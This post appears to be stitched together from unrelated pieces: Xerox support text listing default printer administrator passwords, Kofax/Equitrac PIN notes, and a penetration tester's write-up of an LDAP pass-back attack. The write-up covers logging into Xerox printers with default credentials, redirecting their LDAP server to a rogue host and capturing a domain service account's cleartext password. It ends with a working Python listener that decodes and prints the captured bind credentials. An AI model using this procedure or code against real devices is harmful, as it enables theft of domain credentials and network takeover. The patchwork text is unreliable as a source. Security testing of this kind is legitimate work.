Fuji Xerox Administrator Password


Jenifer Griffard

Aug 5, 2024, 1:34:59 AM
to globlamansi
We receive many questions about the username and password on Xerox printers and multifunction devices (MFDs). The username and password are required for system administrator access to the printer and to its embedded web server (EWS), and they help safeguard the machine from unwanted settings changes.

The optimum scenario is for one person to be the system administrator of the printer. That person is responsible for any setting or set-up changes to the device, and is the one who changes the username and password to protect the printer from unwanted changes. Once the username and/or password are changed from the defaults, which is highly recommended, they cannot be reset without a call to support; depending on the model, the reset may require a visit from a technician.


The default password is 1111 on most printers; on some models it is the serial number of the machine. The password on most devices is case sensitive, so if your serial number contains letters, use the correct case.


Due to security concerns and the complexity of the procedure, we cannot post or give instructions for resetting the username and/or password back to the defaults in online support or on the customer support forums. The process is not for users: it puts the user in an area of the machine where a mistake could render the machine unusable if the steps are not followed exactly. More importantly, it removes a layer of security if everyone knows or can learn how to reset the username and/or password.


If the username and/or password is changed, remember the new values or record them somewhere away from the device. Consider having at least two people know this information, in case one of them is unavailable when an issue comes up that requires the administrator credentials.




Issue: If the Kofax Unified Client Login application is in use and the device is configured in the DRS, the client uses the Administrator PIN set on the Equitrac server side as the password, both at the device and on the device web page. In this case the default user name ("admin") and the default device administrator password ("equitrac") do not work.


Solution: Verify or update the current device Administrator PIN in Equitrac. Log in to Equitrac with administrator privileges. In System Configuration, go to Global Configuration Settings > Embedded Devices and select Canon Unified Client on the left. The Embedded Devices: Canon Unified Client panel appears. Under Settings, verify or revise the Administrator PIN.


Issue: If the Kofax Unified Client Login application is in use and the device is configured in the DRS, the client uses the Admin Access Password set in the DRS as the password, both at the device and on the device web page. The default user name is "admin".


Note: Depending on when the device was manufactured or the software version installed, the default administrator password may be the device serial number or 1111. The username and password are case sensitive.




The attack I'm about to show you is not specific to Xerox printers. It is a weakness affecting the large majority of off-the-shelf IoT devices: we redirect an MFP into authenticating via LDAP or SMB against a rogue system instead of the expected server (often called a pass-back attack). In essence we are abusing the trust relationship between the device and critical systems such as Active Directory. These are devices you will commonly run into during internal penetration tests, and most of the time network admins do not bother changing the default credentials. The result is that an attacker obtains valid domain credentials, which can be used as a stepping stone to domain admin in the network.


On a recent engagement I found myself inside a client's network with the usual internal software, PBXs, security alarm systems, FTP clients and A LOT of printers. Unfortunately, most were patched and the default passwords changed. All except for the Xerox printers. The printers on the network were Xerox AltaLink B8055s, and the default credentials for these are admin:1111.


As seen in the image below, we were able to authenticate successfully. Note that even if the username and password have been changed, it is feasible to brute-force this login, since the username remains admin and the password is typically easily guessable.


Here is where the LDAP server is configured. We can see that two LDAP server IPs are set, 10.101.x.x and 10.115.x.x, and if we look at the Login Name we see that a domain-joined service account, domain\printersvc, is being used for this service (this is the default service account).


What we'll do is change the IP address of the LDAP server to the IP address of our machine, so that the printer's LDAP queries come to us instead of to the real server. For those who don't know, LDAP is queried in plain text: a simple bind sends the DN and password in the clear unless the device has been configured to use LDAPS or StartTLS. What we're trying to do here is have the domain\printersvc user authenticate to us via LDAP so that we can recover its credentials in clear text.


As seen above, we've changed the IP address of the Xerox's LDAP server to our machine. Once this has been done, go to the User Mappings page seen below and validate that the LDAP server is the IP of our machine. At this point we use the netcat utility to receive the connection, which displays the credentials the printer uses to reach the Active Directory domain controller, including domain, username and password. Once our netcat listener is set up, we use the LDAP server search field and search for anything; the lookup forces the printer to bind to us first.


TADA, now you've got a domain user and their credentials. From here your job is relatively easy. In the best-case scenario you've just obtained an AD user account that belongs to privileged security groups.


A sad truth from experience is that these printer service accounts will typically belong to a privileged group such as "Domain Admins" or "Enterprise Admins", which grants the attacker full control over the Active Directory domain, turning this typically Medium CVSS finding (default credentials) into a critical vulnerability.


If you're unlucky and you're not DA, you can still use the domain user to gain a foothold in the domain. For example, given that this is probably not a Red Team, you might as well run BloodHound with this service account to enumerate all domain users.


As a gentle reminder, this type of vulnerability can be found on most systems you'll typically encounter on a client's network. So always test for default credentials, no matter how silly or unimpactful you think that system may be.


At your computer, open a web browser (such as Firefox, Chrome or Internet Explorer), and type the IP address of the printer in the address field, then press Enter.

Note: If your printer is locked, type the system administrator user name and password to access the Properties tab. The administrator user name is admin and the default password is 1111.

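The LDAP redirection described above captures the bind with a raw netcat listener, which dumps the printer's bytes as-is. Below is an added example, not code from the original post or from Xerox, of a small Python listener that does the same job but decodes the LDAP BindRequest (BER-encoded per RFC 4511) so that the message ID, bind DN and cleartext password come out as fields instead of a byte dump; it also recognizes a SASL bind, where no reusable password is on the wire. The DN CORP\printersvc, the password Pr1nter! and the message IDs are constructed sample values, not from the engagement.

```python
"""Rogue LDAP listener that decodes the simple bind a misdirected MFP sends.
Added example, not from the original post; all sample values are constructed."""
import socket
import sys

# BER tags used by an LDAPMessage carrying a BindRequest (RFC 4511 / X.690).
TAG_SEQUENCE = 0x30
TAG_INTEGER = 0x02
TAG_OCTET_STRING = 0x04
TAG_BIND_REQUEST = 0x60   # [APPLICATION 0] IMPLICIT SEQUENCE
TAG_AUTH_SIMPLE = 0x80    # AuthenticationChoice simple [0]: cleartext password
TAG_AUTH_SASL = 0xA3      # AuthenticationChoice sasl [3]: mechanism + credentials


def read_tlv(buf, pos):
    """Return (tag, value, next_pos) for the BER element at buf[pos].
    Raises IndexError if the buffer is truncated."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                     # long form: low 7 bits = count of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise IndexError("truncated BER element")
    return tag, buf[pos:pos + length], pos + length


def encode_tlv(tag, value):
    """Encode one BER element, using long-form length above 127 bytes."""
    if len(value) < 0x80:
        return bytes([tag, len(value)]) + value
    length_bytes = len(value).to_bytes((len(value).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length_bytes)]) + length_bytes + value


def build_simple_bind(message_id, dn, password):
    """Fabricate the LDAPMessage a printer emits for a simple bind (message_id < 128).
    Used only to produce offline sample traffic for parse_bind_request."""
    bind = (encode_tlv(TAG_INTEGER, b"\x03")                 # LDAP version 3
            + encode_tlv(TAG_OCTET_STRING, dn.encode())
            + encode_tlv(TAG_AUTH_SIMPLE, password.encode()))
    body = encode_tlv(TAG_INTEGER, bytes([message_id])) + encode_tlv(TAG_BIND_REQUEST, bind)
    return encode_tlv(TAG_SEQUENCE, body)


def parse_bind_request(data):
    """Return (message_id, dn, secret) for a BindRequest, or None for anything else.
    For a simple bind `secret` is the cleartext password; for a SASL bind it is
    '<SASL mechanism>' because no reusable password is present."""
    try:
        tag, msg, _ = read_tlv(data, 0)
        if tag != TAG_SEQUENCE:
            return None
        tag, mid, pos = read_tlv(msg, 0)
        if tag != TAG_INTEGER:
            return None
        tag, bind, _ = read_tlv(msg, pos)
        if tag != TAG_BIND_REQUEST:
            return None
        _, _version, pos = read_tlv(bind, 0)       # version, not needed further
        _, dn, pos = read_tlv(bind, pos)
        auth_tag, auth, _ = read_tlv(bind, pos)
        if auth_tag == TAG_AUTH_SIMPLE:
            secret = auth.decode(errors="replace")
        elif auth_tag == TAG_AUTH_SASL:
            _, mech, _ = read_tlv(auth, 0)         # SaslCredentials.mechanism
            secret = "<SASL " + mech.decode(errors="replace") + ">"
        else:
            return None
    except IndexError:
        return None
    return int.from_bytes(mid, "big"), dn.decode(errors="replace"), secret


def serve(bind_addr="0.0.0.0", port=389):
    """Accept connections like `nc -lvp 389`, but print the decoded bind.
    Point the printer's LDAP server setting at this host, then trigger a lookup."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_addr, port))
        srv.listen()
        while True:
            conn, peer = srv.accept()
            with conn:                              # one bind fits in a single read
                result = parse_bind_request(conn.recv(4096))
            if result:
                print(f"{peer[0]}: id={result[0]} dn={result[1]!r} secret={result[2]!r}")
            else:
                print(f"{peer[0]}: connection did not start with a BindRequest")


if __name__ == "__main__":
    if len(sys.argv) > 1 and sys.argv[1] == "--serve":
        serve(port=int(sys.argv[2]) if len(sys.argv) > 2 else 389)
    else:                                           # offline demo on constructed traffic
        sample = build_simple_bind(1, "CORP\\printersvc", "Pr1nter!")
        print(sample.hex())
        print(parse_bind_request(sample))
```

Run it without arguments to see the constructed bind and its decoded fields, or with `--serve 389` (as root, or pick a high port and redirect) in place of the netcat listener. Because the decoder checks the [0] simple tag, a device that has been switched to LDAPS or a SASL mechanism shows up as such instead of yielding a password, which is exactly the check to run when verifying a remediation.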